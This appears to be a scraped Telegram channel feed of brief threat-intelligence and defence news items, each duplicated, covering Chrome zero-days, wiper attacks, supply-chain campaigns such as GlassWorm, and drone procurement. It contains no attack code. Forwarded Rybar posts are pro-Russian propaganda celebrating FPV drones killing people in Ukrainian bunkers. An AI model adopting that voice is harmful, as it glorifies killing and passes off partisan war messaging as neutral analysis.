🔍 Chrome Zero-Days Patched Under Fire
Google has issued an emergency Chrome update addressing two zero-day vulnerabilities — one in the Skia graphics library and one in the V8 JavaScript engine — both confirmed as actively exploited at time of release. The patch brings Chrome's total actively exploited vulnerabilities in 2026 to three.
Two distinct subsystems compromised within a single browser cycle indicates parallel exploitation activity rather than isolated discovery. V8 has historically been a high-value target for sandbox escape chains; Skia vulnerabilities typically enable memory corruption at the rendering layer.
🛰️ Open sources - closed narratives
@sitreports
Google has issued an emergency Chrome update addressing two zero-day vulnerabilities — one in the Skia graphics library and one in the V8 JavaScript engine — both confirmed as actively exploited at time of release. The patch brings Chrome's total actively exploited vulnerabilities in 2026 to three.
Two distinct subsystems compromised within a single browser cycle indicates parallel exploitation activity rather than isolated discovery. V8 has historically been a high-value target for sandbox escape chains; Skia vulnerabilities typically enable memory corruption at the rendering layer.
🛰️ Open sources - closed narratives
@sitreports
Forwarded from Rybar in English
On resource reallocation in the SMO
When officials hear military needs, they argue about finite budgets. They say we need everything, but the budget is not unlimited.
On TAKTIKAR, we showed why mechanized assaults have stopped working. Why not buy fewer armored vehicles that survive one attack in favor of heavy FPV drones?
For one BMD-4M, you can buy over 1,100 unmanned systems. Refusing to purchase a battalion of these vehicles or tanks (not counting ammunition) could free up significant funds.
The priority is destroying AFU personnel with drone crews, which heavy FPV drones handle better than APCs, IFVs, and tanks.
Without infantry support, it dies, and there's no one left to attack (or defend). And without people, tank numbers don't matter.
#UAV #Russia
Please open Telegram to view this post
VIEW IN TELEGRAM
🔍 DRILLAPP Backdoor Targets Ukraine
A JavaScript backdoor designated DRILLAPP was deployed against Ukrainian targets in February 2026, abusing Microsoft Edge remote debugging features to conduct covert surveillance. The implant capabilities include camera access, microphone capture, and screen recording.
Abusing legitimate browser debugging interfaces reduces the malware's detection surface by operating through trusted process channels rather than injecting standalone executables. This technique places DRILLAPP within a documented pattern of browser-native exploitation used in long-term espionage operations against Ukrainian infrastructure.
🛰️ Open sources - closed narratives
@sitreports
A JavaScript backdoor designated DRILLAPP was deployed against Ukrainian targets in February 2026, abusing Microsoft Edge remote debugging features to conduct covert surveillance. The implant capabilities include camera access, microphone capture, and screen recording.
Abusing legitimate browser debugging interfaces reduces the malware's detection surface by operating through trusted process channels rather than injecting standalone executables. This technique places DRILLAPP within a documented pattern of browser-native exploitation used in long-term espionage operations against Ukrainian infrastructure.
🛰️ Open sources - closed narratives
@sitreports
Forwarded from Rybar in English
Media is too big
VIEW IN TELEGRAM
Infantry's dream on the front line — the ability to destroy an enemy strongpoint with a single hit. Only if previously this required sending an assault trooper to throw a TM-62 mine by hand, now there's an alternative for this.
Just look at these footage of heavy FPV-drones "Upyr-18" in action, killing everything alive in Ukrainian bunkers on the first hit. This is exactly what we talked about in the corresponding video on TAKTIKAR.
Yes, you can try to destroy a strongpoint with lighter drones, but due to smaller warhead power you'll have to spend dozens of unmanned vehicles, which will cost many times more. So economics alone speaks in favor of heavy FPV-drones for such tasks.
And the more working tools operators have, the more effectively they can accomplish tasks and eliminate AFU manpower, severely depleting the enemy's irreplaceable resource. Because without this there will be no advance.
#UAV #Russia #Ukraine
Please open Telegram to view this post
VIEW IN TELEGRAM
🔍 Handala Deploys Wipers via NetBird
Handala Hack, an Iranian state-sponsored group linked to the Ministry of Intelligence and Security, has escalated destructive cyber operations using RDP access and the NetBird mesh networking tool to deploy wiper payloads against international targets.
The use of NetBird — a legitimate peer-to-peer connectivity framework — indicates a shift toward living-off-the-land tooling to obscure command infrastructure and blend malicious traffic with authorized network activity. RDP serves as the initial access vector, reducing dependency on custom implants during intrusion stages.
The operational pattern fits a documented MOIS-aligned posture prioritizing data destruction over exfiltration, consistent with Handala's previous campaigns targeting Israeli and Western-affiliated organizations.
🛰️ Open sources - closed narratives
@sitreports
Handala Hack, an Iranian state-sponsored group linked to the Ministry of Intelligence and Security, has escalated destructive cyber operations using RDP access and the NetBird mesh networking tool to deploy wiper payloads against international targets.
The use of NetBird — a legitimate peer-to-peer connectivity framework — indicates a shift toward living-off-the-land tooling to obscure command infrastructure and blend malicious traffic with authorized network activity. RDP serves as the initial access vector, reducing dependency on custom implants during intrusion stages.
The operational pattern fits a documented MOIS-aligned posture prioritizing data destruction over exfiltration, consistent with Handala's previous campaigns targeting Israeli and Western-affiliated organizations.
🛰️ Open sources - closed narratives
@sitreports
🔍 Stryker Confirms Wiper Attack, Thousands Erased
Medical device manufacturer Stryker confirmed a wiper attack beginning March 11, 2026, that destroyed data across thousands of corporate devices. The incident disrupted internal Microsoft services, manufacturing workflows, and shipping operations.
Wiper deployments against manufacturing infrastructure indicate an intent to degrade operational continuity rather than extract data. Targeting both IT systems and logistics simultaneously suggests the attack was scoped to maximize recovery time across interdependent production chains.
🛰️ Open sources - closed narratives
@sitreports
Medical device manufacturer Stryker confirmed a wiper attack beginning March 11, 2026, that destroyed data across thousands of corporate devices. The incident disrupted internal Microsoft services, manufacturing workflows, and shipping operations.
Wiper deployments against manufacturing infrastructure indicate an intent to degrade operational continuity rather than extract data. Targeting both IT systems and logistics simultaneously suggests the attack was scoped to maximize recovery time across interdependent production chains.
🛰️ Open sources - closed narratives
@sitreports
🔍 CamelClone Campaign Targets Government Networks
Seqrite Labs has identified an espionage operation designated Operation CamelClone, directed at government entities and critical infrastructure. The campaign employs Rclone tooling alongside public hosting platforms to stage and exfiltrate data, reducing infrastructure costs and complicating attribution by leveraging legitimate services.
The use of Rclone for exfiltration follows an established pattern among state-aligned threat actors seeking to blend malicious transfers with routine cloud traffic. Routing data through public hosting sites further obscures collection activity from network-layer detection, a technique observed across multiple documented espionage clusters targeting public sector networks.
🛰️ Open sources - closed narratives
@sitreports
Seqrite Labs has identified an espionage operation designated Operation CamelClone, directed at government entities and critical infrastructure. The campaign employs Rclone tooling alongside public hosting platforms to stage and exfiltrate data, reducing infrastructure costs and complicating attribution by leveraging legitimate services.
The use of Rclone for exfiltration follows an established pattern among state-aligned threat actors seeking to blend malicious transfers with routine cloud traffic. Routing data through public hosting sites further obscures collection activity from network-layer detection, a technique observed across multiple documented espionage clusters targeting public sector networks.
🛰️ Open sources - closed narratives
@sitreports
🔍 CISA Adds Wing FTP to KEV
CISA has added CVE-2025-47813 to its Known Exploited Vulnerabilities catalog following confirmed active exploitation of a flaw in Wing FTP Server that exposes internal server paths, providing attackers with reconnaissance data usable in follow-on operations.
The path disclosure class of vulnerability is routinely leveraged to map server infrastructure prior to lateral movement or privilege escalation. CISA has set a remediation deadline of March 30, 2026 for federal agencies under BOD 22-01 obligations.
🛰 Open sources - closed narratives
@sitreports
CISA has added CVE-2025-47813 to its Known Exploited Vulnerabilities catalog following confirmed active exploitation of a flaw in Wing FTP Server that exposes internal server paths, providing attackers with reconnaissance data usable in follow-on operations.
The path disclosure class of vulnerability is routinely leveraged to map server infrastructure prior to lateral movement or privilege escalation. CISA has set a remediation deadline of March 30, 2026 for federal agencies under BOD 22-01 obligations.
🛰 Open sources - closed narratives
@sitreports
🔫 Federal Agencies Test Counter-Drone Laser
Multiple federal agencies conducted a joint test of a classified directed-energy weapon at White Sands Missile Range, New Mexico. The laser test targeted counter-drone applications, placing it within an accelerating U.S. effort to field non-kinetic intercept capability against unmanned aerial systems.
The multi-agency format indicates the program crosses organizational boundaries — likely spanning defense, homeland security, and intelligence equities. Directed-energy testing at White Sands follows an established pattern of low-visibility evaluation before transition to operational deployment.
🛰 Open sources - closed narratives
@sitreports
Multiple federal agencies conducted a joint test of a classified directed-energy weapon at White Sands Missile Range, New Mexico. The laser test targeted counter-drone applications, placing it within an accelerating U.S. effort to field non-kinetic intercept capability against unmanned aerial systems.
The multi-agency format indicates the program crosses organizational boundaries — likely spanning defense, homeland security, and intelligence equities. Directed-energy testing at White Sands follows an established pattern of low-visibility evaluation before transition to operational deployment.
🛰 Open sources - closed narratives
@sitreports
🔍 Iran War Drives 245% Cybercrime Surge
Since the outbreak of the Iran war, cybercrime activity has risen 245%, according to recent reporting. Hacktivist groups have been routing operations through proxy infrastructure based in Russia and China, generating billions of connection attempts designed for abuse.
The pattern fits an established operational model: conflict events function as force multipliers for hacktivist mobilization, with anonymizing proxy networks providing plausible deniability and scalability. Routing through Russian and Chinese infrastructure complicates attribution and raises the threshold for any formal state-level response.
🛰️ Open sources - closed narratives
@sitreports
Since the outbreak of the Iran war, cybercrime activity has risen 245%, according to recent reporting. Hacktivist groups have been routing operations through proxy infrastructure based in Russia and China, generating billions of connection attempts designed for abuse.
The pattern fits an established operational model: conflict events function as force multipliers for hacktivist mobilization, with anonymizing proxy networks providing plausible deniability and scalability. Routing through Russian and Chinese infrastructure complicates attribution and raises the threshold for any formal state-level response.
🛰️ Open sources - closed narratives
@sitreports
🔍 GlassWorm Targets Python Supply Chain
A campaign designated GlassWorm has been injecting malware into GitHub-hosted Python repositories via stolen authentication tokens since March 8, 2026. The method relies on force-pushed commits, allowing attackers to overwrite repository history without triggering standard pull-request review processes.
The GlassWorm campaign fits an established pattern of software supply-chain compromise in which upstream code repositories are used as distribution vectors rather than targeting end users directly. Stolen tokens bypass credential-based controls entirely, reducing the attack surface visible to repository owners.
🛰️ Open sources - closed narratives
@sitreports
A campaign designated GlassWorm has been injecting malware into GitHub-hosted Python repositories via stolen authentication tokens since March 8, 2026. The method relies on force-pushed commits, allowing attackers to overwrite repository history without triggering standard pull-request review processes.
The GlassWorm campaign fits an established pattern of software supply-chain compromise in which upstream code repositories are used as distribution vectors rather than targeting end users directly. Stolen tokens bypass credential-based controls entirely, reducing the attack surface visible to repository owners.
🛰️ Open sources - closed narratives
@sitreports
🔍 LUCAS Drone Stockpile: Combat Debut
The Pentagon's LUCAS drone inventory stands in the dozens as the system enters combat deployment with U.S. Central Command. Pentagon CTO Emil Michael stated that full-rate production has not been reached, and available units were shipped as-is to theater.
The deployment reflects a pattern common to accelerated defense acquisition cycles: operational introduction precedes production scale-up. Fielding low-inventory systems into active commands functions as a live validation phase, with production ramp contingent on battlefield performance data.
🛰️ Open sources - closed narratives
@sitreports
The Pentagon's LUCAS drone inventory stands in the dozens as the system enters combat deployment with U.S. Central Command. Pentagon CTO Emil Michael stated that full-rate production has not been reached, and available units were shipped as-is to theater.
The deployment reflects a pattern common to accelerated defense acquisition cycles: operational introduction precedes production scale-up. Fielding low-inventory systems into active commands functions as a live validation phase, with production ramp contingent on battlefield performance data.
🛰️ Open sources - closed narratives
@sitreports
🏦 Bank Builds Internal AI Threat Agent
Commonwealth Bank developed an in-house AI threat hunting agent after determining that third-party vendors could not match the tempo of emerging threats. The decision reflects a structural shift in enterprise security architecture — proprietary tooling replacing or supplementing commercial solutions where detection velocity is the primary operational requirement.
Following deployment, weekly threat signal volume increased from 80 million to 400 billion, while mean response time dropped from two days to 30 minutes. The threat agent build represents a direct acknowledgment that AI-generated attack surface expansion requires AI-native defense infrastructure operating at matching scale.
🛰️ Open sources - closed narratives
@sitreports
Commonwealth Bank developed an in-house AI threat hunting agent after determining that third-party vendors could not match the tempo of emerging threats. The decision reflects a structural shift in enterprise security architecture — proprietary tooling replacing or supplementing commercial solutions where detection velocity is the primary operational requirement.
Following deployment, weekly threat signal volume increased from 80 million to 400 billion, while mean response time dropped from two days to 30 minutes. The threat agent build represents a direct acknowledgment that AI-generated attack surface expansion requires AI-native defense infrastructure operating at matching scale.
🛰️ Open sources - closed narratives
@sitreports
🔍 Golden Dome Budget Hits $185B
The projected cost of the U.S. Defense Department's Golden Dome homeland missile defense architecture has risen to approximately $185 billion, a $10 billion increase attributed to the expansion of space-based components. The revision was disclosed by the program's director.
The cost growth follows a structural pattern common to layered missile defense programs: space-based sensor and intercept layers carry disproportionate integration costs and extend procurement timelines. The $10 billion addition reflects prioritization of orbital infrastructure over ground-based redundancy in the current architecture.
🛰️ Open sources - closed narratives
@sitreports
The projected cost of the U.S. Defense Department's Golden Dome homeland missile defense architecture has risen to approximately $185 billion, a $10 billion increase attributed to the expansion of space-based components. The revision was disclosed by the program's director.
The cost growth follows a structural pattern common to layered missile defense programs: space-based sensor and intercept layers carry disproportionate integration costs and extend procurement timelines. The $10 billion addition reflects prioritization of orbital infrastructure over ground-based redundancy in the current architecture.
🛰️ Open sources - closed narratives
@sitreports
🤿 Exail Underwater Drone Orders Surge
French defense technology firm Exail Technologies reported an 87% increase in order intake for the full year, reaching 844 million euros. Core profit rose 40% to 103 million euros. The growth is attributed primarily to demand for underwater drone systems.
The figures indicate accelerating procurement of unmanned underwater vehicles across Exail's customer base. The scale of order intake relative to profit margin suggests a pipeline extending multiple years forward, consistent with defense acquisition cycles rather than commercial spot demand.
🛰️ Open sources - closed narratives
@sitreports
French defense technology firm Exail Technologies reported an 87% increase in order intake for the full year, reaching 844 million euros. Core profit rose 40% to 103 million euros. The growth is attributed primarily to demand for underwater drone systems.
The figures indicate accelerating procurement of unmanned underwater vehicles across Exail's customer base. The scale of order intake relative to profit margin suggests a pipeline extending multiple years forward, consistent with defense acquisition cycles rather than commercial spot demand.
🛰️ Open sources - closed narratives
@sitreports
🔍 EU Sanctions Chinese, Iranian Cyber Actors
The European Union has imposed sanctions on Chinese and Iranian firms and individuals linked to cyberattacks targeting critical infrastructure across EU member states. The designated actors are attributed to operations affecting over 65,000 devices within the bloc.
The designations follow an established EU pattern of using the cyber sanctions regime as a signaling instrument against state-proximate threat actors. Targeting both Chinese and Iranian entities in a single package indicates coordinated attribution across two distinct threat clusters rather than a response to a single incident.
🛰️ Open sources - closed narratives
@sitreports
The European Union has imposed sanctions on Chinese and Iranian firms and individuals linked to cyberattacks targeting critical infrastructure across EU member states. The designated actors are attributed to operations affecting over 65,000 devices within the bloc.
The designations follow an established EU pattern of using the cyber sanctions regime as a signaling instrument against state-proximate threat actors. Targeting both Chinese and Iranian entities in a single package indicates coordinated attribution across two distinct threat clusters rather than a response to a single incident.
🛰️ Open sources - closed narratives
@sitreports
🔍 Iran Targets Medical Tech Firm
Iranian threat actors conducted a cyberattack against Stryker, a US-based medical technology company, according to reporting on the incident. The operation is assessed as part of Iran's sustained use of offensive cyber capability as an asymmetric instrument, compensating for conventional force limitations in air and naval domains.
The targeting of a medical device manufacturer fits a documented pattern of Iranian cyber operations against US critical infrastructure and dual-use industrial sectors. Stryker produces equipment used across both civilian hospitals and military medical supply chains, giving the target strategic relevance beyond commercial disruption.
🛰 Open sources - closed narratives
@sitreports
Iranian threat actors conducted a cyberattack against Stryker, a US-based medical technology company, according to reporting on the incident. The operation is assessed as part of Iran's sustained use of offensive cyber capability as an asymmetric instrument, compensating for conventional force limitations in air and naval domains.
The targeting of a medical device manufacturer fits a documented pattern of Iranian cyber operations against US critical infrastructure and dual-use industrial sectors. Stryker produces equipment used across both civilian hospitals and military medical supply chains, giving the target strategic relevance beyond commercial disruption.
🛰 Open sources - closed narratives
@sitreports
🔍 Japan Authorizes Offensive Cyber Operations
From October 1st, Japan's government will permit proactive cyber-defense operations — a doctrine authorizing intrusion into adversary networks before an attack occurs. Per legislative review, the policy shift moves Japan from a strictly defensive posture to one permitting preemptive network operations, functionally equivalent to what other states classify as offensive cyber capability.
The change marks a structural departure from Japan's postwar security constraints. Operationally, proactive cyber-defense grants state actors authority to conduct reconnaissance and interdiction inside foreign infrastructure — capabilities previously held only by allies such as the U.S. Cyber Command and the UK's NCSC-aligned offensive units.
🛰️ Open sources - closed narratives
@sitreports
From October 1st, Japan's government will permit proactive cyber-defense operations — a doctrine authorizing intrusion into adversary networks before an attack occurs. Per legislative review, the policy shift moves Japan from a strictly defensive posture to one permitting preemptive network operations, functionally equivalent to what other states classify as offensive cyber capability.
The change marks a structural departure from Japan's postwar security constraints. Operationally, proactive cyber-defense grants state actors authority to conduct reconnaissance and interdiction inside foreign infrastructure — capabilities previously held only by allies such as the U.S. Cyber Command and the UK's NCSC-aligned offensive units.
🛰️ Open sources - closed narratives
@sitreports
🔍 U.S. Agencies Build Central Surveillance Database
Multiple federal agencies are pooling immigration records, Social Security numbers, and additional personal data into a centralized government database, according to reported disclosures. The Freedom of the Press Foundation has filed suit to determine the full scope of data aggregation underway.
Centralized identity repositories of this structure reduce inter-agency friction in population tracking and expand query capability across previously siloed datasets. The litigation targets procedural transparency, not the database's operational status.
🛰️ Open sources - closed narratives
@sitreports
Multiple federal agencies are pooling immigration records, Social Security numbers, and additional personal data into a centralized government database, according to reported disclosures. The Freedom of the Press Foundation has filed suit to determine the full scope of data aggregation underway.
Centralized identity repositories of this structure reduce inter-agency friction in population tracking and expand query capability across previously siloed datasets. The litigation targets procedural transparency, not the database's operational status.
🛰️ Open sources - closed narratives
@sitreports
🔍 GlassWorm Returns, Hits 400 Repos
The GlassWorm supply-chain campaign has re-emerged with a coordinated operation targeting over 400 packages, repositories, and extensions across GitHub, npm, VSCode, and OpenVSX.
The simultaneous reach across four distinct platforms indicates deliberate multi-vector targeting rather than opportunistic infection. Compromising IDE extensions alongside package registries expands the attack surface to development environments directly, not only downstream dependencies.
This pattern fits an established model of supply-chain infiltration where developer tooling is treated as an insertion point into build pipelines. Repeated deployment of the same campaign suggests persistent infrastructure behind GlassWorm rather than isolated actors.
🛰️ Open sources - closed narratives
@sitreports
The GlassWorm supply-chain campaign has re-emerged with a coordinated operation targeting over 400 packages, repositories, and extensions across GitHub, npm, VSCode, and OpenVSX.
The simultaneous reach across four distinct platforms indicates deliberate multi-vector targeting rather than opportunistic infection. Compromising IDE extensions alongside package registries expands the attack surface to development environments directly, not only downstream dependencies.
This pattern fits an established model of supply-chain infiltration where developer tooling is treated as an insertion point into build pipelines. Repeated deployment of the same campaign suggests persistent infrastructure behind GlassWorm rather than isolated actors.
🛰️ Open sources - closed narratives
@sitreports
🔍 Iran Cyber-EW Operations Converge
Following a joint US-Israeli military operation initiated on February 28, 2026, Iran-linked actors began integrating cyber operations with electronic warfare capabilities as regional conflict escalated.
The convergence of cyber and EW domains marks a structural shift in Iranian operational doctrine — moving from parallel-track disruption toward synchronized, multi-domain degradation of adversary communications, navigation, and command infrastructure.
🛰️ Open sources - closed narratives
@sitreports
Following a joint US-Israeli military operation initiated on February 28, 2026, Iran-linked actors began integrating cyber operations with electronic warfare capabilities as regional conflict escalated.
The convergence of cyber and EW domains marks a structural shift in Iranian operational doctrine — moving from parallel-track disruption toward synchronized, multi-domain degradation of adversary communications, navigation, and command infrastructure.
🛰️ Open sources - closed narratives
@sitreports